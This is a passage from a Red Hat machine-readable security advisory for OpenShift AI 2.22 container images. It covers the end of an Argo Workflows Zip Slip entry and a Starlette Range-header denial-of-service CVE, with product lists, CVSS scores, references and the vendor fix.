"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/argoproj/argo-workflows: Argo Workflows Zip Slip"
},
{
"cve": "CVE-2025-62727",
"cwe": {
"id": "CWE-407",
"name": "Inefficient Algorithmic Complexity"
},
"discovery_date": "2025-10-28T21:01:03.833849+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2406929"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service vulnerability has been discovered in the python Starlette framework. an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This induces CPU exhaustion per request, causing a denial\u2011of\u2011service for endpoints serving files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "starlette: Starlette DoS via Range header merging",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "RHBZ#2406929",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406929"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-62727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5",
"url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
}
],
"release_date": "2025-10-28T20:14:53.655000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
